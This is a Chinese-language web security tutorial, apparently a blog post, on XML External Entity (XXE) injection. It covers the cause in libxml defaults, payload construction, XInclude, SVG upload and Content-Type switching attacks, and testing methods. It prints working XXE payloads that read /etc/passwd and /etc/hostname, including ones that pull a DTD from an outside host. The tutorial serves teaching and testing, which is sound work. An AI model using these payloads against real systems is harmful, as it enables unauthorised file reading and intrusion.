- 1SQLAlchemy_sqlalchemy clickhouse
- 2一文熟悉Trusted Firmware-M
- 3(2022.5)Pyhthon Matplotlib实现在图中绘制多子图(一纸多图)_ax = ax.ravel()
- 4《数据库技术原理与应用教程第2版》——3.6计算机世界与物理模型
- 5《舌尖上的中国》经典语录_舌尖上的中国经典旁白合集
- 6postgreSQL安装配置
- 7uniapp 中使用echarts,app端特别注意_uniapp echarts 移动端
- 8数据对象操作SQLAlchemy ----创建表_sqlalchemy column concat
- 9DQN:深度Q-网络_dqn网络
- 10520要通过这种方式告白 html+css+javascript canvas桃心代码 可修改_css表白代码
XML 外部实体注入漏洞_activemq xml注入
赞
踩
0x01 XXE(XML外部实体注入)漏洞
1.1 漏洞原因
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行、内网扫描等危害。
libxml<2.9 默认开启
1.2 漏洞构造方式
1.2.1 直接通过DTD外部实体声明
- <?xml version="1.0"?>
-
- <!DOCTYPE a[
-
- <!ENTITY b SYSTEM "file:///etc/passwd">
-
- ]>
-
- <a>&b;</a>
1.2.2 通过DTD外部实体声明引入外部DTD文档
- #构造数据包
- <?xml version="1.0"?>
-
- <!DOCTYPE m [
-
- <!ENTITY b SYSTEM "http://mark4z5.com/evil.dtd">
-
- ]>
-
- <a>&b;</a>
-
- #而http://mark4z5.com/evil.dtd内容为
-
- <!ENTITY b SYSTEM "file:///etc/passwd">
-
1.2.3 通过DTD外部实体声明引入DTD文档
- # 构造数据包
- <?xml version="1.0"?>
-
- <!DOCTYPE a [
-
- <!ENTITY %b SYSTEM "http://mark4z5.com/evil.dtd">
-
- ]>
-
- <a>%b;</a>
-
- #http://mark4z5.com/evil.dtd文件内容
-
- <!ENTITY b SYSTEM "file:///etc/passwd">
-
1.3 XML可解析的协议
| libxml2 | file、http、ftp |
| PHP | file、http、ftp、php、glob、data... |
| JAVA | file、http、ftp、https、jar、gopher... |
| .NET | file、http、ftp、https |
0x02 寻找XXE漏洞隐藏的攻击面
XXE漏洞的攻击面通常为HTTP传输流量下的XML数据请求,但是在其他方面可能也存在XXE漏洞。
2.1 XInclude攻击
一些应用程序在用户提交数据后,服务器将数据嵌入到XML文档中,然后对XML进行解析。例如当客户端提交的数据被放入后端的SOAP请求,然后由SOAP服务处理时,就会发生这种情况。
由于无法控制XML文档,对DTD文档进行修改触发而XXE漏洞,我们可以使用Xinclude进行攻击。XInclude 是一种使用元素、属性以及 URI 引用来合并 XML 文档的机制,它是XML规范的一部分,允许在子文档中构建XML文档。我们可以在XML文档中放入恶意数据来进行XInclude攻击,攻击条件为我们可以控制传输中的数据,将其替换为服务器短的XML文件。
通过参考XInclude命名空间和提供我们想要包含的文件路径,可以完成XInclude的XXE攻击。
- <foo xmlns:xi="http://www.w3.org/2001/XInclude">
- <xi:include parse="text" href="file:///etc/passwd"/></foo>
2.2 通过文件上传进行XXE攻击
一些应用程序允许上传使用XML或者包含XML组件的格式文件,并且在服务端会对其进行处理、验证,常见的有DOCX、SVG等格式。
尤其在图片上传中,服务端可能期望获取到PNG、JPG格式的图片,但是服务端使用的处理库可能同样是支持SVG格式的,所以我们可以通过上传SVG格式的图片来进行XXE攻击。
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
2.3 通过修改Content-Type头进行XXE攻击
大多数情况下,POST请求包使用的是默认的application/x-www-form-urlencoded。有些网站希望接收这种格式的请求,但会容忍其他内容类型,包括XML。
- # 普通的请求包:
-
- POST /action HTTP/1.0
-
- Content-Type: application/x-www-form-urlencoded
-
- Content-Length: 7
-
-
- foo=bar
-
- # 可以替换为:
-
- POST /action HTTP/1.0
-
- Content-Type: text/xml
-
- Content-Length: 52
-
-
- <?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
如果应用程序容忍消息正文中包含 XML 的请求,并将正文内容解析为 XML,那么您只需将请求重新格式化为使用 XML 格式即可到达隐藏的 XXE 攻击面。
0x03 如何查找和测试XXE漏洞
通过定义一个指向系统文件的外部实体,尝试对系统文件目录进行遍历,查看返回包是否包含XXE注入信息。
构建http://dnslog.cn/等基于可控的外部实体注入,然后对可控URL进行监控,判断是否存在XXE漏洞。
对于用户端使用非XML文档交互的接口,使用XInclude攻击来尝试包含一个有用的系统文件。
参考资料:
XXE漏洞详解(XML外部实体注入)_谢公子的博客-CSDN博客
What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy
